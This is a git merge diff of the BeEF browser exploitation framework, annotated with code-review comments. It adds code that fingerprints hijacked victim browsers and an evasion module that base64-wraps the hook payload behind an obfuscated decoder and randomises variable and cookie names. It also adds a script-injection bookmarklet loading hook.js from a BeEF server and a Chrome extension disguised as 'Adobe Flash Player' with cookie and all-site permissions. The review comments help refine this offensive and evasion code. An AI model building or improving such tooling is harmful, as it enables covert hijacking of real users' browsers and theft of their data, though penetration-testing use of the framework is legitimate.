Merge remote branch 'upstream/master'

root
2012-06-08 08:30:35 +02:00
82 changed files with 2054 additions and 123 deletions


@@ -72,13 +72,13 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
-----
To get started, simply execute beef and follow the instrustions:
To get started, simply execute beef and follow the instructions:
$ ./beef
$ ./beef

11
beef

@@ -59,6 +59,15 @@ if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
BeEF::Core::Console::Banners.print_ascii_art
end
# @note Check if port and WebSocket port need to be updated from command line parameters
unless BeEF::Core::Console::CommandLine.parse[:port].empty?
config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
end
unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
end
# @note Prints BeEF welcome message
BeEF::Core::Console::Banners.print_welcome_msg
@@ -115,7 +124,7 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
#@note Starts the WebSocket server
if config.get("beef.http.websocket.enable")
BeEF::Core::Websocket::Websocket.instance
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port")}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
end
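Review bot: The `--port` and `--wsport` values reach `config.set` as raw strings, with no check that they are numeric or inside 1–65535 (the two `unless ... .empty?` blocks before the welcome message). Only the WebSocket log line applies `.to_i`, so a value such as `abc` is stored as given and logged as port 0. I would convert once at assignment, e.g. `config.set('beef.http.port', Integer(BeEF::Core::Console::CommandLine.parse[:port]))`, and reject values outside the valid range before the servers start. The option definitions in the command-line parser section store `p` and `ws_port` unvalidated as well, so the check could equally live there.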


@@ -78,10 +78,10 @@ module Filters
true
end
# Verify the screen params are valid
# Verify the screen size is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid screen param characters
def self.is_valid_screen_params?(str)
# @return [Boolean] If the string has valid screen size characters
def self.is_valid_screen_size?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
@@ -105,6 +105,15 @@ module Filters
true
end
# Verify the date stamp is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid date stamp characters
def self.is_valid_date_stamp?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
# Verify the browser_plugins string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser plugin characters
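Review bot: `is_valid_date_stamp?` accepts any printable string of up to 200 characters, so it never checks that the value resembles a date even though the docstring promises "valid date stamp characters" and the value is supplied by the hooked browser. I would add an allow-list of the characters a date string can contain, anchored with `\A` and `\z`, before `true`; localized timezone names may need to be allowed for. Separately, if `get_param` can hand back nil for a missing key, `str.length` raises; whether `has_non_printable_char?` already rejects nil is not visible in this section, so a guard such as `return false unless str.is_a?(String)` would make that explicit.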


@@ -166,10 +166,18 @@ beef.browser = {
/**
* Returns true if FF12
* @example: beef.browser.isFF12()
* @example: beef.browser.isFF12()
*/
isFF12: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
},
/**
* Returns true if FF13
* @example: beef.browser.isFF13()
*/
isFF13: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
},
/**
@@ -177,7 +185,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
* @example: beef.browser.isFF()
*/
isFF: function() {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13();
},
/**
@@ -411,6 +419,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
FF10: this.isFF10(), // Firefox 10
FF11: this.isFF11(), // Firefox 11
FF12: this.isFF12(), // Firefox 12
FF13: this.isFF13(), // Firefox 13
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -468,6 +477,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
if (this.isFF10()) { return '10' }; // Firefox 10
if (this.isFF11()) { return '11' }; // Firefox 11
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isFF13()) { return '13' }; // Firefox 13
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
@@ -704,7 +714,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
/**
* Returns zombie screen size and color depth.
*/
getScreenParams: function() {
getScreenSize: function() {
return {
width: window.screen.width,
height: window.screen.height,
@@ -753,10 +763,11 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
var hostname = document.location.hostname;
var hostport = (document.location.port)? document.location.port : "80";
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_params = beef.browser.getScreenParams();
var screen_size = beef.browser.getScreenSize();
var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
@@ -778,9 +789,10 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
if(hostport) details["HostPort"] = hostport;
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
if(date_stamp) details['DateStamp'] = date_stamp;
if(system_platform) details['SystemPlatform'] = system_platform;
if(browser_type) details['BrowserType'] = browser_type;
if(screen_params) details['ScreenParams'] = screen_params;
if(screen_size) details['ScreenSize'] = screen_size;
if(window_size) details['WindowSize'] = window_size;
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
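Review bot: Renaming `getScreenParams` to `getScreenSize` drops a public `beef.browser` method with no alias, so any caller that this commit does not update fails at run time with "is not a function". Only the `beef.browser.popup` caller is visibly updated on this page. A transitional alias such as `getScreenParams: function() { return this.getScreenSize(); },` would keep older modules working. The `details` key changes from `ScreenParams` to `ScreenSize` at the same time, so records stored under the old key will presumably no longer be read by the UI code that now looks up `ScreenSize`.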


@@ -25,7 +25,7 @@ beef.browser.popup = {
blocker_enbabled: function ()
{
screenParams = beef.browser.getScreenParams();
screenParams = beef.browser.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
@@ -36,4 +36,4 @@ beef.browser.popup = {
}
};
beef.regCmp('beef.browser.popup');
beef.regCmp('beef.browser.popup');
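Review bot: `screenParams` is assigned without `var` in `blocker_enbabled`, so it becomes a property of the page's global object and can collide with a variable of the same name on the hooked page. Its name is also stale after the rename. I would write `var screenSize = beef.browser.getScreenSize();` and use `screenSize.width` and `screenSize.height` in the `window.open` call. The function body continues outside the hunk.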


@@ -177,7 +177,7 @@ beef.mitb = {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
};
y.send(query);
beef.mitb.sniff("POST: " + url + "[" + query + "]");
return true;
@@ -227,7 +227,7 @@ beef.mitb = {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);


@@ -26,6 +26,9 @@ module BeEF
@options[:resetdb] = false
@options[:ascii_art] = false
@options[:ext_config] = ""
@options[:port] = ""
@options[:ws_port] = ""
@already_parsed = false
@@ -53,6 +56,14 @@ module BeEF
opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
@options[:ext_config] = f
end
opts.on('-p', '--port PORT', 'Change the default BeEF listening port') do |p|
@options[:port] = p
end
opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port|
@options[:ws_port] = ws_port
end
end
optparse.parse!


@@ -118,6 +118,14 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
# get and store the date
date_stamp = get_param(@data['results'], 'DateStamp')
if BeEF::Filters.is_valid_date_stamp?(date_stamp)
BD.set(session_id, 'DateStamp', date_stamp)
else
self.err_msg "Invalid date returned from the hook browser's initial connection."
end
# get and store page title
page_title = get_param(@data['results'], 'PageTitle')
if BeEF::Filters.is_valid_pagetitle?(page_title)
@@ -175,11 +183,11 @@ module BeEF
end
# get and store the zombie screen size and color depth
screen_params = get_param(@data['results'], 'ScreenParams')
if BeEF::Filters.is_valid_screen_params?(screen_params)
BD.set(session_id, 'ScreenParams', screen_params)
screen_size = get_param(@data['results'], 'ScreenSize')
if BeEF::Filters.is_valid_screen_size?(screen_size)
BD.set(session_id, 'ScreenSize', screen_size)
else
self.err_msg "Invalid screen params returned from the hook browser's initial connection."
self.err_msg "Invalid screen size returned from the hook browser's initial connection."
end
# get and store the window size


@@ -77,7 +77,7 @@ module Modules
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.obfuscate(@hook)
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
end
@body << @hook

View File

@@ -50,26 +50,34 @@ module BeEF
build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
ws = BeEF::Core::Websocket::Websocket.instance
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@output = evasion.obfuscate(command_module.output)
else
@output = command_module.output
end
#todo antisnatchor: remove this gsub crap adding some hook packing.
if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
content = command_module.output.gsub('//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//', "")
ws.send(content, hooked_browser.session)
#content = command_module.output.gsub('//
#// Copyright 2012 Wade Alcorn wade@bindshell.net
#//
#// Licensed under the Apache License, Version 2.0 (the "License");
#// you may not use this file except in compliance with the License.
#// You may obtain a copy of the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in writing, software
#// distributed under the License is distributed on an "AS IS" BASIS,
#// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#// See the License for the specific language governing permissions and
#// limitations under the License.
#//', "")
ws.send(@output, hooked_browser.session)
else
@body << command_module.output + "\n\n"
@body << @output + "\n\n"
end
# @note prints the event to the console
if BeEF::Settings.console?
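Review bot: The fifteen-line `gsub` call is left in the handler as commented-out code under the todo; dead code like this should be deleted, since version control keeps the history. The removal also changes behaviour: the WebSocket branch used to strip the license header from `command_module.output` and now sends `@output` unchanged when evasion is disabled, so please confirm that is intended. `@output` is only used inside this method as far as the hunk shows, so a local variable would avoid keeping per-request data on the instance. The enclosing method starts and ends outside the hunk.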


@@ -119,21 +119,36 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the date stamp
date_stamp = BD.get(zombie_session, 'DateStamp')
if not date_stamp.nil?
encoded_date_stamp = CGI.escapeHTML(date_stamp)
encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
page_name_row = {
'category' => 'Host',
'data' => encoded_date_stamp_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
if not host_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_os_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
if not browser_name.nil?
@@ -224,24 +239,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController
end
# set and add the zombie screen size and color depth
screen_params = BD.get(zombie_session, 'ScreenParams')
if not screen_params.nil?
screen_size = BD.get(zombie_session, 'ScreenSize')
if not screen_size.nil?
screen_params_hash = JSON.parse(screen_params.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_params_hash['width']
screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
(print_error "width is wrong type";return) if not width.is_a?(Fixnum)
height = screen_params_hash['height']
height = screen_size_hash['height']
(print_error "height is wrong type";return) if not height.is_a?(Fixnum)
colordepth = screen_params_hash['colordepth']
colordepth = screen_size_hash['colordepth']
(print_error "colordepth is wrong type";return) if not colordepth.is_a?(Fixnum)
# construct the string to be displayed in the details tab
encoded_screen_params = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_params_hash = { 'Screen Params' => encoded_screen_params }
encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
page_name_row = {
'category' => 'Host',
'data' => encoded_screen_params_hash,
'data' => encoded_screen_size_hash,
'from' => 'Initialization'
}
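Review bot: The OS-name block is guarded by `if not host_name.nil?` although the value it escapes is `os_name`, so `CGI.escapeHTML` is called with nil when the host name is known but the OS name is not, and the row is skipped in the opposite case. The guard should read `if not os_name.nil?`, as the matching block in the ShellInterface section does. The +/- markers are lost on this page, so this line may be unchanged context rather than part of the commit, but it sits directly below the new date-stamp block and is worth fixing in the same pass.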


@@ -328,21 +328,36 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the date
date_stamp = BD.get(self.targetsession, 'DateStamp')
if not date_stamp.nil?
encoded_date_stamp = CGI.escapeHTML(date_stamp)
encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
page_name_row = {
'category' => 'Host',
'data' => encoded_date_stamp,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
os_name = BD.get(self.targetsession, 'OsName')
if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_os_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
@@ -433,21 +448,21 @@ class ShellInterface
end
# set and add the zombie screen size and color depth
screen_params = BD.get(self.targetsession, 'ScreenParams')
if not screen_params.nil?
screen_size = BD.get(self.targetsession, 'ScreenSize')
if not screen_size.nil?
screen_params_hash = JSON.parse(screen_params.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_params_hash['width']
height = screen_params_hash['height']
colordepth = screen_params_hash['colordepth']
screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
colordepth = screen_size_hash['colordepth']
# construct the string to be displayed in the details tab
encoded_screen_params = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_params_hash = { 'Screen Params' => encoded_screen_params }
encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
page_name_row = {
'category' => 'Host',
'data' => encoded_screen_params_hash,
'data' => encoded_screen_size_hash,
'from' => 'Initialization'
}
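Review bot: In the new date block the row is built with `'data' => encoded_date_stamp`, the bare escaped string, while `encoded_date_stamp_hash` is created just above it and never used. Every other row in this method, and the same block in the admin UI controller, passes the hash, so the consumer of `summary_grid_hash` will presumably get a string where it expects a label/value pair. The line should be `'data' => encoded_date_stamp_hash,`. Note also that the screen-size block here has no `is_a?` type checks on `width`, `height` and `colordepth`, unlike its counterpart in the admin UI controller.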


@@ -0,0 +1,4 @@
d=document;
e=d.createElement('script');
e.src="http://127.0.0.1:3000/hook.js";
d.body.appendChild(e);

Binary file not shown.

After

Width:  |  Height:  |  Size: 11 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.6 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.6 KiB


@@ -0,0 +1,26 @@
{
// Simple chrome extension
// Just loads beef into the extension context.
//
// You may need to set the IP address of the beef hook in background.js
// Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/
"name": "Adobe Flash Player",
"version": "11.2.202.235",
"description": "Introduces vulnerabilites into web browsers",
"background": {
"scripts": ["background.js"]
},
"icons": {
"16": "icon16.png",
"48": "icon48.png",
"128": "icon128.png"
},
"permissions": [
"tabs",
"http://*/*",
"https://*/*",
"file://*/*",
"cookies"
]
}

Binary file not shown.

Binary file not shown.

After

Width:  |  Height:  |  Size: 47 KiB


@@ -0,0 +1,4 @@
<p>&nbsp;</p>
<a href="#" onclick="javascript:alert('You clicked a link at '+window.location);">moooooooo</a>
<p>&nbsp;</p>


@@ -20,5 +20,9 @@ beef:
name: 'Evasion'
authors: ["antisnatchor"]
scramble_variables: true
to_scramble: ["beef", "Beef"]
scramble_cookies: true
scramble:
beef: "beef"
Beef: "Beef"
evercookie: "evercookie"
chain: ["scramble","minify","base_64"]


@@ -29,6 +29,26 @@ module BeEF
@input = apply_chain(input, @@techniques)
end
def add_bootstrapper
@bootstrap = ''
# add stuff at the end, only once (when serving the initial init javascript)
@@techniques.each do |technique|
#1. get the ruby module inside the obfuscation directory: the file name will be the same of the string used in "chain"
#2. call the "execute" method of the ruby module, passing the input
#3. update the input in order that next technique will work on the pre-processed input.
if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb")
print_debug "[OBFUSCATION] Applying technique [#{technique}]"
klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance
is_bootstrap_needed = klass.need_bootstrap
if is_bootstrap_needed
@bootstrap += klass.get_bootstrap
end
end
@bootstrap
end
@bootstrap
end
def apply_chain(input, techniques)
@output = input
techniques.each do |technique|
@@ -37,8 +57,7 @@ module BeEF
#3. update the input in order that next technique will work on the pre-processed input.
if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb")
print_debug "[OBFUSCATION] Applying technique [#{technique}]"
klass = BeEF::Extension::Evasion.const_get(technique.capitalize)
klass = klass.instance
klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance
@output = klass.execute(@output, @@config)
end
@output
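Review bot: The three numbered comments and the debug line in `add_bootstrapper` were copied from `apply_chain` and describe calling `execute` and updating the input, which this method does not do; it only concatenates each technique's `get_bootstrap` output. I would replace them with a single comment such as `# collect the bootstrap code of every technique in the chain that needs one` and change the log call to `print_debug "[OBFUSCATION] Adding bootstrap for technique [#{technique}]"`. The bare `@bootstrap` inside the `each` block has no effect and can be dropped. `File.exists?` is the deprecated spelling (removed in Ruby 3.2); `File.exist?` works on all versions.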


@@ -26,6 +26,7 @@ end
end
require 'extensions/evasion/evasion'
require 'extensions/evasion/helper'
require 'extensions/evasion/obfuscation/scramble'
require 'extensions/evasion/obfuscation/minify'
require 'extensions/evasion/obfuscation/base_64'


@@ -0,0 +1,33 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Evasion
# Common methods used by multiple obfuscation techniques
module Helper
def self.random_string(length=5)
chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
result = ''
length.times { result << chars[rand(chars.size)] }
result
end
end
end
end
end
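Review bot: `Helper.random_string` has no method documentation, and the reason its alphabet omits `i`, `l`, `o`, `I` and `O` is not stated. I would add YARD lines in the style used elsewhere in the project: `# @param [Integer] length Number of characters to generate` and `# @return [String] Random string of ASCII letters`. A one-line comment should also say whether the missing letters are deliberate. It is worth noting in the docstring that `rand` is not a cryptographic generator, so the result must not be used as a secret or token.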


@@ -19,19 +19,20 @@ module BeEF
class Base_64
include Singleton
def random_string(length=5)
chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
result = ''
length.times { result << chars[rand(chars.size)] }
result
def need_bootstrap
true
end
def get_bootstrap
# the decode function is obfuscated, and it's called "dec" (see below in "execute", where it is used)
decode_function = 'var _0x33db=["\x61\x74\x6F\x62","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68","\x6A\x6F\x69\x6E"];function dec(_0x487fx2){if(window[_0x33db[0]]){return atob(_0x487fx2);} ;var _0x487fx3=_0x33db[1];var _0x487fx4,_0x487fx5,_0x487fx6,_0x487fx7,_0x487fx8,_0x487fx9,_0x487fxa,_0x487fxb,_0x487fxc=0,_0x487fxd=0,dec=_0x33db[2],_0x487fxe=[];if(!_0x487fx2){return _0x487fx2;} ;_0x487fx2+=_0x33db[2];do{_0x487fx7=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx8=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx9=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxa=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxb=_0x487fx7<<18|_0x487fx8<<12|_0x487fx9<<6|_0x487fxa;_0x487fx4=_0x487fxb>>16&0xff;_0x487fx5=_0x487fxb>>8&0xff;_0x487fx6=_0x487fxb&0xff;if(_0x487fx9==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4);} else {if(_0x487fxa==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5);} else {_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5,_0x487fx6);} ;} ;} while(_0x487fxc<_0x487fx2[_0x33db[6]]);;dec=_0x487fxe[_0x33db[7]](_0x33db[2]);return dec;};'
end
def execute(input, config)
encoded = Base64.strict_encode64(input)
# basically, use atob if supported otherwise a normal base64 JS implementation (ie.: IE :-)
decode_function = 'var _0x33db=["\x61\x74\x6F\x62","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68","\x6A\x6F\x69\x6E"];function dec(_0x487fx2){if(window[_0x33db[0]]){return atob(_0x487fx2);} ;var _0x487fx3=_0x33db[1];var _0x487fx4,_0x487fx5,_0x487fx6,_0x487fx7,_0x487fx8,_0x487fx9,_0x487fxa,_0x487fxb,_0x487fxc=0,_0x487fxd=0,dec=_0x33db[2],_0x487fxe=[];if(!_0x487fx2){return _0x487fx2;} ;_0x487fx2+=_0x33db[2];do{_0x487fx7=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx8=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx9=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxa=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxb=_0x487fx7<<18|_0x487fx8<<12|_0x487fx9<<6|_0x487fxa;_0x487fx4=_0x487fxb>>16&0xff;_0x487fx5=_0x487fxb>>8&0xff;_0x487fx6=_0x487fxb&0xff;if(_0x487fx9==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4);} else {if(_0x487fxa==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5);} else {_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5,_0x487fx6);} ;} ;} while(_0x487fxc<_0x487fx2[_0x33db[6]]);;dec=_0x487fxe[_0x33db[7]](_0x33db[2]);return dec;};'
var_name = random_string(3)
input = "var #{var_name}=\"#{encoded}\";#{decode_function}[].constructor.constructor(dec(#{var_name}))();"
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(dec(#{var_name}))();"
print_debug "[OBFUSCATION - BASE64] Javascript has been base64'ed'"
input
end
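Review bot: `need_bootstrap` and `get_bootstrap` form an undocumented interface that `add_bootstrapper` expects of every technique class, and the predicate lacks the conventional `?` suffix. The Minify and Scramble sections define `need_bootstrap` the same way and have no `get_bootstrap`, which is only safe while theirs returns false. I would rename it to `need_bootstrap?` together with its caller and add a short comment on each method stating the contract, e.g. `# @return [Boolean] whether get_bootstrap must be served before output of this technique`. `execute` still reassigns its `input` parameter and ignores `config`; a local variable for the result would read more clearly.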


@@ -19,6 +19,11 @@ module BeEF
require 'jsmin'
class Minify
include Singleton
def need_bootstrap
false
end
def execute(input, config)
input = JSMin.minify(input)
print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified"


@@ -19,28 +19,44 @@ module BeEF
class Scramble
include Singleton
def random_string(length=5)
chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
result = ''
length.times { result << chars[rand(chars.size)] }
result
def need_bootstrap
false
end
def execute(input, config)
to_scramble = config.get('beef.extension.evasion.to_scramble')
to_scramble.each do |var|
mod_var = random_string
input = input.gsub!(var,random_string)
print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]"
@output = input
#todo: add scrambled vars to an Hash.
#todo: even better. Add them to the Configuration object, like "beef" => "cnjD3"
#@@to_scramble = config.get('beef.http.evasion.scramble_variables')
#@@scrambled = Hash.new
to_scramble = config.get('beef.extension.evasion.scramble')
to_scramble.each do |var, value|
if var == value
# Variables have not been scrambled yet
mod_var = BeEF::Extension::Evasion::Helper::random_string(3)
@output.gsub!(var,mod_var)
config.set("beef.extension.evasion.scramble.#{var}",mod_var)
print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]"
else
# Variables already scrambled, re-use the one already created to maintain consistency
@output.gsub!(var,value)
print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{value}]"
end
@output
end
input
end
if config.get('beef.extension.evasion.scramble_cookies')
# ideally this should not be static, but it's static in JS code, so fine for nowend
mod_cookie = BeEF::Extension::Evasion::Helper::random_string(5)
if config.get('beef.http.hook_session_name') == "BEEFHOOK"
@output.gsub!("BEEFHOOK",mod_cookie)
config.set('beef.http.hook_session_name',mod_cookie)
print_debug "[OBFUSCATION - SCRAMBLER] cookie [BEEFHOOK] scrambled -> [#{mod_cookie}]"
else
@output.gsub!("BEEFHOOK",config.get('beef.http.hook_session_name'))
print_debug "[OBFUSCATION - SCRAMBLER] cookie [BEEFHOOK] scrambled -> [#{config.get('beef.http.hook_session_name')}]"
end
end
@output
end
end
end
end
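Review bot: `@output = input` followed by `@output.gsub!` rewrites the caller's string in place, and because `Scramble` includes `Singleton` the value also stays in shared instance state between calls. Working on a local copy avoids both: `output = input.dup`, then `output.gsub!(...)` and return `output`. The bare `@output` inside the `each` block has no effect, and `mod_cookie` is generated before the check that decides whether it is needed. The comment ending in "fine for nowend" has a stray `end` pasted into it.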


